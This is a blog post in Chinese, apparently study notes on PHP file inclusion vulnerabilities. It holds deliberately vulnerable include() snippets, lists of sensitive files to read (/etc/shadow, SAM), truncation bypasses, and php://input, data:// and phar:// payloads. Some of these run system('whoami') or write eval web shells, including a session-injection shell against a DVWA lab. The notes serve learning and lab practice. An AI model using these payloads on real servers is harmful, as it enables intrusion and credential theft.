<!DOCTYPE html>
<html lang="zh-Hans">
  <head><meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="文件包含漏洞学习笔记"/><meta name="keywords" content="文件包含漏洞, Shu1L's blog" /><link rel="alternate" href="/atom.xml" title="Shu1L's blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.11.0" />
<link rel="canonical" href="https://shu1l.github.io/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/"/>

<link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />
<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.11.0" />

<script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script>
  window.config = {"leancloud":{"app_id":null,"app_key":null},"toc":true,"fancybox":true,"pjax":"","latex":false};
</script>

    <title>文件包含漏洞学习笔记 - Shu1L's blog</title>
  <meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="Shu1L's blog" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">Shu1L's blog</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/">
        <li class="mobile-menu-item">Home
          </li>
      </a><a href="/archives/">
        <li class="mobile-menu-item">Archives
          </li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">Tags
          </li>
      </a><a href="/categories/">
        <li class="mobile-menu-item">Categories
          </li>
      </a><a href="/about/">
        <li class="mobile-menu-item">About
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">Shu1L's blog</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/">
            Home
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/archives/">
            Archives
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/tags/">
            Tags
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/categories/">
            Categories
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/about/">
            About
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">文件包含漏洞学习笔记
        </h1>

      <div class="post-meta">
        <span class="post-time">
          2020-04-03
        </span><span class="post-category">
            <a href="/categories/web%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">web漏洞学习</a>
            </span>
        </div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">Contents</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#文件包含漏洞相关知识点"><span class="toc-text">文件包含漏洞相关知识点</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#什么是文件包含？"><span class="toc-text">什么是文件包含？</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#文件包含函数"><span class="toc-text">文件包含函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#漏洞产生的原因"><span class="toc-text">漏洞产生的原因</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#分类"><span class="toc-text">分类</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#本地文件包含漏洞"><span class="toc-text">本地文件包含漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#一、无限制本地文件包含漏洞"><span class="toc-text">一、无限制本地文件包含漏洞</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#二、session文件包含漏洞"><span class="toc-text">二、session文件包含漏洞</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#三、有限制本地文件包含漏洞绕过"><span class="toc-text">三、有限制本地文件包含漏洞绕过</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#远程文件包含漏洞"><span class="toc-text">远程文件包含漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#PHP伪协议在文件包含中的应用"><span class="toc-text">PHP伪协议在文件包含中的应用</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#php-input"><span class="toc-text">php:&#x2F;&#x2F;input</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#php-input-（读取POST数据）"><span class="toc-text">php:&#x2F;&#x2F;input （读取POST数据）</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#php-input-命令执行"><span class="toc-text">php:&#x2F;&#x2F;input(命令执行)</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#data-伪协议"><span class="toc-text">data:&#x2F;&#x2F;伪协议</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#phar伪协议"><span class="toc-text">phar伪协议</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#zip：-伪协议"><span class="toc-text">zip：&#x2F;&#x2F;伪协议</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#本地包含配合文件上传"><span class="toc-text">本地包含配合文件上传</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#包含日志文件"><span class="toc-text">包含日志文件</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#SSH-log"><span class="toc-text">SSH log</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#包含临时文件"><span class="toc-text">包含临时文件</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#jsp文件包含漏洞"><span class="toc-text">jsp文件包含漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#asp文件包含漏洞"><span class="toc-text">asp文件包含漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#aspx文件包含漏洞"><span class="toc-text">aspx文件包含漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#参考文章："><span class="toc-text">参考文章：</span></a></li></ol></li></ol>
    </div>
  </div><div class="post-content"><h4 id="文件包含漏洞相关知识点"><a href="#文件包含漏洞相关知识点" class="headerlink" title="文件包含漏洞相关知识点"></a>文件包含漏洞相关知识点</h4><h5 id="什么是文件包含？"><a href="#什么是文件包含？" class="headerlink" title="什么是文件包含？"></a>什么是文件包含？</h5><p>​       服务器执行PHP文件时，可以通过文件包含函数加载另一个文件中的PHP代码，并且当PHP执行，这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，您只更新一个包含文件就可以了，或者当您向网站添加一张新页面时，仅仅需要修改一下菜单文件（而不是更新所有网页中的链接）。</p>
<h5 id="文件包含函数"><a href="#文件包含函数" class="headerlink" title="文件包含函数"></a>文件包含函数</h5><ul>
<li>require()</li>
<li>require_once()</li>
<li>include()</li>
<li>include_once()</li>
</ul>
<p><strong><code>include</code>和<code>require</code>区别</strong>:<code>include</code>在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行；而<code>require</code>函数出现错误的时候，会直接报错并退出程序的执行。</p>
<p>而<code>include_once()</code>，<code>require_once()</code>这两个函数，与前两个的不同之处在于这两个函数只包含一次，适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下，你想确保它只被包括一次以避免函数重定义，变量重新赋值等问题。</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-7889a572371b18c8.png" alt></p>
<h5 id="漏洞产生的原因"><a href="#漏洞产生的原因" class="headerlink" title="漏洞产生的原因"></a>漏洞产生的原因</h5><p>文件包含函数加载的参数没有经过过滤或者严格的定义，可以被用户控制，包含其他恶意文件，导致执行了非预期的代码。</p>
<p>示例代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">       $filename=$GET[<span class="string">'filename'</span>];</span><br><span class="line">       <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>$_GET[&#39;filename&#39;]</code>参数开发者没有经过严格的过滤，直接带入了include的函数，攻击者可以修改<code>$_GET[&#39;filename&#39;]</code>的值，执行非预期的操作。</p>
<h4 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h4><p>文件包含分为：本地(LFI)/远程(RFI)包含</p>
<p>本地文件包含漏洞，顾名思义，指的是能打开并包含本地文件的漏洞。大部分情况下遇到的文件包含漏洞都是LFI。简单的测试用例如前所示。</p>
<p>远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的，因此漏洞一旦存在危害性会很大。<br> 但RFI的利用条件较为苛刻，需要php.ini中进行配置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen &#x3D; On</span><br><span class="line">allow_url_include &#x3D; On，重启apache，即可生效</span><br></pre></td></tr></table></figure>

<p>两个配置选项均需要为On，才能远程包含文件成功。<br> 另外一台需要开启apache</p>
<figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt-<span class="keyword">get</span> install apache2</span><br><span class="line"> /etc/<span class="keyword">init</span>.d/apache2 start</span><br></pre></td></tr></table></figure>

<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-952116d80dc7f768%5B1%5D.png" alt></p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-e288840e08e52b5e%5B1%5D.png" alt></p>
<p> 注：在php.ini中，allow_url_fopen默认一直是On，而<code>allow_url_include</code>从php5.2之后就默认为Off。<br> 下面例子中测试代码均为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $file = $_GET[<span class="string">'file'</span>];</span><br><span class="line">    <span class="keyword">include</span> $file;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>allow_url_fopen 默认为 On<br> allow_url_include 默认为 Off<br> 若有特殊要求，会在利用条件里指出。</p>
<h4 id="本地文件包含漏洞"><a href="#本地文件包含漏洞" class="headerlink" title="本地文件包含漏洞"></a>本地文件包含漏洞</h4><h5 id="一、无限制本地文件包含漏洞"><a href="#一、无限制本地文件包含漏洞" class="headerlink" title="一、无限制本地文件包含漏洞"></a>一、无限制本地文件包含漏洞</h5><p><strong>测试代码：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename =$_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>常见的敏感信息目录：</strong></p>
<p>window系统：</p>
<ul>
<li>c:\boot.ini //查看系统版本</li>
<li>c:\windows\system32\inetsrv\MetaBase.xml //IIS配置</li>
<li>c:\windows\repair\sam  // 存储Windows系统初次安装的密码</li>
<li>c:\ProgramFiles\mysql\my.ini // MySQL配置</li>
<li>c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码</li>
<li>c:\windows\php.ini // php 配置信息</li>
</ul>
<p>Linux系统</p>
<ul>
<li>/etc/passwd // 账户信息</li>
<li>/etc/shadow // 账户密码文件</li>
<li>/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件</li>
<li>/etc/my.conf // mysql 配置文件</li>
</ul>
<h5 id="二、session文件包含漏洞"><a href="#二、session文件包含漏洞" class="headerlink" title="二、session文件包含漏洞"></a>二、session文件包含漏洞</h5><p><strong>利用条件</strong></p>
<p>1.我们可以通过phpinfo的信息泄露获取到session的存储位置</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ%E6%88%AA%E5%9B%BE20200123104312.png" alt></p>
<p>2.或者通过猜测默认的session存放位置</p>
<p>linux下的默认存储目录为/var/lib/php/session</p>
<p><strong>利用过程</strong></p>
<p>我们可以先使用文件包含上传恶意代码，比如</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line">$ctfs=$_GET[<span class="string">'ctfs'</span>];</span><br><span class="line"></span><br><span class="line">$_SESSION[<span class="string">"username"</span>]=$ctfs;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>此php会将获取到的GET型ctfs变量的值存入到session中。如果存在本地文件包含漏洞，就可以通过ctfs写入恶意代码到session文件中，然后通过文件包含漏洞执行此恶意代码。<br>我们构造：</p>
<img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ截图20200123104221.png" style="zoom:80%;">

<p>我们发现在本地session所在目录下存储了session的值</p>
<img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ截图20200123105708.png" style="zoom:80%;">

<p>攻击者通过phpinfo()信息泄露或者猜测获取到session存放的目录位置，然后通过浏览器自带开发者模式获取到文件名称：sess_lotipf7ccidsbsrltdau35rb65</p>
<img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ截图20200123103711.png" style="zoom:150%;">

<p>构造本地文件包含 ：<strong>file.php?D:\phpStudy\PHPTutorial\tmp\tmp\sess_lotipf7ccidsbsrltdau35rb65</strong></p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ%E6%88%AA%E5%9B%BE20200123104500.png" alt></p>
<h5 id="三、有限制本地文件包含漏洞绕过"><a href="#三、有限制本地文件包含漏洞绕过" class="headerlink" title="三、有限制本地文件包含漏洞绕过"></a>三、有限制本地文件包含漏洞绕过</h5><p><strong>%00截断</strong></p>
<p>条件：magic_quotes_gpc=Off  并且php版本&lt;5.3.4</p>
<p><strong>测试代码</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $filename  = $_GET[<span class="string">'filename'</span>];</span><br><span class="line">    <span class="keyword">include</span>($filename . <span class="string">".html"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>当我们直接包含本地的test.txt时</p>
<img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ截图20200123113838.png" style="zoom:67%;">

<p>我们在test.txt加上%00进行截断</p>
<img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ截图20200123113851.png" style="zoom:67%;">







<p><strong>四、路径长度限制</strong></p>
<p>条件：windows OS,点号需要长于256；linuxOS 长于4096</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">windows下目录最大长度为<span class="number">256</span>字节，超出的部分会被丢弃；</span><br><span class="line">linux下目录最大长度为<span class="number">4096</span>字节，超出的部分会被丢弃。</span><br></pre></td></tr></table></figure>

<p>测试代码：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">   $filename =$_GET[<span class="string">'filename'</span>];</span></span><br><span class="line"><span class="php">   <span class="keyword">include</span>($filename . <span class="string">".html"</span>);</span></span><br><span class="line"><span class="php">   <span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<h4 id="远程文件包含漏洞"><a href="#远程文件包含漏洞" class="headerlink" title="远程文件包含漏洞"></a>远程文件包含漏洞</h4><p>PHP的配置文件allow_url_fopen和allow_url_include设置为ON，include/require等包含函数可以加载远程文件，如果远程文件没经过严格的过滤，导致了执行恶意文件的代码，这就是远程文件包含漏洞。</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">allow_url_fopen</span> = <span class="literal">On</span>（是否允许打开远程文件）</span><br><span class="line"><span class="attr">allow_url_include</span> = <span class="literal">On</span>（是否允许include/require远程文件）</span><br></pre></td></tr></table></figure>

<p>示例：</p>
<p>测试代码：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">    $filename  = $_GET[<span class="string">'filename'</span>];</span></span><br><span class="line"><span class="php">    <span class="keyword">include</span>($filename);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ%E6%88%AA%E5%9B%BE20200203191630.png" alt></p>
<h4 id="PHP伪协议在文件包含中的应用"><a href="#PHP伪协议在文件包含中的应用" class="headerlink" title="PHP伪协议在文件包含中的应用"></a>PHP伪协议在文件包含中的应用</h4><p>PHP带有很多内置URL风格的封装协议，可用于类似fopen()、copy()、file_exists()和filesize()的文件系统函数。除了这些封装协议、还能通过stream_wrapper_register() 来注册自定义的封装协议。</p>
<p><strong>php伪协议类别</strong></p>
<ul>
<li>file://    访问本地文件系统</li>
<li>http://   访问HTTP（s)网址</li>
<li>ftp://     访问FTP(s) URLs</li>
<li>php://      访问各个输入/输出流</li>
<li>zlib://     压缩流</li>
<li>data://  数据</li>
</ul>
<p><strong>php://filter(本地磁盘文件进行读取）</strong></p>
<p>元封装器，设计用于“数据流打开“时的”筛选过滤“应用，对本地磁盘文件进行读写。</p>
<p>用法：?filename=php://filter/convert.base64-encode/resource=xxx.php</p>
<p>条件：需要开启allow_url_fopen</p>
<p>示例：</p>
<p>本地新建file.php</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ%E6%88%AA%E5%9B%BE20200128205700.png" alt></p>
<p>我们使用php伪协议在本地读取shell.php文件中的内容</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ%E6%88%AA%E5%9B%BE20200128205953.png" alt></p>
<p>对得到的Base64进行解码即可。</p>
<p><strong>file://伪协议（读取文件内容）</strong></p>
<p>通过file协议可以访问本地文件系统，读取到文件的内容</p>
<p>示例：</p>
<img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ截图20200203184038.png" style="zoom:67%;">



<h5 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h5><p>可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。 enctype=”multipart/form-data” 的时候 php://input 是无效的。</p>
<p>用法：?file=php://input 数据利用POST传过去。</p>
<p>利用条件：</p>
<p>allow_url_include = On。<br> 对allow_url_fopen不做要求</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>phpinfo();<span class="meta">?&gt;</span></span><br><span class="line"><span class="meta">&lt;?</span>php <span class="keyword">system</span>(<span class="string">'whoami'</span>);<span class="meta">?&gt;</span></span><br><span class="line"><span class="meta">&lt;?</span>php fputs(fopen(<span class="string">"shell.php"</span>,<span class="string">"w"</span>),<span class="string">"&lt;?php eval(\$_POST['caidao'];?&gt;)"</span>)<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>包含姿势：</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">index</span>.php</span><br><span class="line">?<span class="keyword">file</span>=php:<span class="comment">//input</span></span><br><span class="line"></span><br><span class="line">POST:</span><br><span class="line">&lt;? phpinfo();?&gt;</span><br></pre></td></tr></table></figure>

<h5 id="php-input-（读取POST数据）"><a href="#php-input-（读取POST数据）" class="headerlink" title="php://input （读取POST数据）"></a>php://input （读取POST数据）</h5><p>​      碰到file_get_contents()就要想到用php://input绕过，因为php伪协议也是可以利用http协议的，即可以使用POST方式传数据，具体函数意义下一项；</p>
<p>测试代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">echo</span> file_get_contents(<span class="string">"php://input"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ截图20200203182852.png" style="zoom:67%;">

<h5 id="php-input-命令执行"><a href="#php-input-命令执行" class="headerlink" title="php://input(命令执行)"></a>php://input(命令执行)</h5><p>测试代码：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">    $filename  = $_GET[<span class="string">'filename'</span>];</span></span><br><span class="line"><span class="php">    <span class="keyword">include</span>($filename);</span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p>条件：php配置文件中需同时开启 allow_url_fopen 和 allow_url_include（PHP &lt; 5.30）,就可以造成任意代码执行，在这可以理解成远程文件包含漏洞（RFI），即POST过去PHP代码，即可执行；</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/QQ%E6%88%AA%E5%9B%BE20200203183726.png" alt></p>
<h5 id="data-伪协议"><a href="#data-伪协议" class="headerlink" title="data://伪协议"></a>data://伪协议</h5><p>数据流封装器，和php://相似都是利用了流的概念，将原本的include的文件流重定向到了用户可控制的输入流中，简单来说就是执行文件的包含方法包含了你的输入流，通过你输入payload来实现目的。</p>
<p>利用条件：</p>
<p>php版本大于等于php5.2<br> allow_url_fopen = On<br> allow_url_include = On</p>
<p>示例1：</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index2.php?<span class="built_in">file</span>=data:<span class="keyword">text</span>/plain,<span class="meta">&lt;?</span>php phpinfo();<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-5449b681b9c47ddb%5B1%5D.png" alt></p>
<p>执行命令：</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index2.php?<span class="built_in">file</span>=data:<span class="keyword">text</span>/plain;<span class="meta">&lt;?</span>php <span class="keyword">system</span>(<span class="string">"whoami"</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-0fce621191e72481%5B1%5D.png" alt></p>
<p>示例2：</p>
<figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index2.php?<span class="keyword">file</span>=data:<span class="keyword">text</span>/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b</span><br></pre></td></tr></table></figure>

<p>加号<code>+</code>的url编码为<code>%2b</code>，<code>PD9waHAgcGhwaW5mbygpOz8+</code>的base64解码为：<?php phpinfo() ?></p>
<p><strong>包含session</strong></p>
<p>利用条件：session文件路径已知，且其中内容部分可控。</p>
<p>思路：结合phpmyadmin,因为phpmyadmin每次登录时，会带上session。</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-dd5195fec4210a53.png" alt></p>
<p>session文件的绝对路径可在phpinfo中查看，session.save_path</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-1e7dd8fd1a028711%5B1%5D.png" alt></p>
<p>常见的php-session存放位置还有这几个：</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/<span class="keyword">var</span>/lib/php/sess_PHPSESSID</span><br><span class="line">/<span class="keyword">var</span>/lib/php/sess_PHPSESSID</span><br><span class="line">/tmp/sess_PHPSESSID</span><br><span class="line">/tmp/sessions/sess_PHPSESSID</span><br></pre></td></tr></table></figure>

<p>使用以下命令可查看到session文件中的登录信息</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">strings /<span class="keyword">var</span>/lib/php5/sess_258c1be1b00d080bddc58d2896460542facb6f1f | grep root</span><br></pre></td></tr></table></figure>

<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-940bb1d740bd0d47%5B1%5D.png" alt></p>
<p>登录phpmyadmin时，用户名输入一句话木马，再包含session文件，可getshell</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>($_POST[<span class="string">'root'</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-c833b1fd110b6170%5B1%5D.png" alt></p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-5304d206d0b1fcc8%5B1%5D.png" alt></p>
<p>使用菜刀连接<br> <a href="http://192.168.1.127/dvwa/vulnerabilities/fi/?page=../../../../../../var/lib/php5/sess_6cf7f14ec1e50c6b2f6d4a8ec671e7aaf92c6c4c" target="_blank" rel="noopener">http://192.168.1.127/dvwa/vulnerabilities/fi/?page=../../../../../../var/lib/php5/sess_6cf7f14ec1e50c6b2f6d4a8ec671e7aaf92c6c4c</a><br> 在浏览器里有你的cookie所以你可以直接去访问对应的文件包含页面，用菜刀的话是没有cookie的所以你没有办法去访问文件包含页面也就是fi那个页面。所以说会自动跳转到登录页面，显示200ok</p>
<p>加上cookie之后在重新连接，成功连接</p>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-44a9d0f1054d26b9%5B1%5D.png" alt></p>
<h5 id="phar伪协议"><a href="#phar伪协议" class="headerlink" title="phar伪协议"></a>phar伪协议</h5><ul>
<li><p>利用条件：php版本大于等于php5.3.0</p>
</li>
<li><p>这个参数就是php解压缩包的一个函数，不管后缀是什么，都会被当做压缩包来解压。</p>
<p>用法：?file=phar://压缩包/内部文件 phar://xxx.png/shell.php </p>
<p>注意： PHP &gt; =5.3.0 压缩包需要是zip协议压缩，rar不行，将木马文件压缩后，改为其他任意格式的文件都可以正常使用。 步骤： 写一个一句话木马文件shell.php，然后用zip协议压缩为shell.zip，然后将后缀改为png等其他格式。 </p>
</li>
<li><p>姿势：假设有个文件phpinfo.txt，其内容为<?php phpinfo(); ?>，打包成zip压缩包，如下：</p>
</li>
</ul>
<p><img src="/2020/04/03/wen-jian-bao-han-lou-dong-xue-xi-bi-ji/9272355-041eece378dca1e4.png" alt></p>
<p>指定绝对路径：</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index2.php?file=phar://C:<span class="symbol">\p</span>hpStudy<span class="symbol">\W</span>WW<span class="symbol">\F</span>ileInclusion<span class="symbol">\p</span>hpinfo.zip<span class="symbol">\p</span>hpinfo.txt</span><br></pre></td></tr></table></figure>

<p>或者利用相对路径（这里phpinfo.zip就在当前目录下）</p>
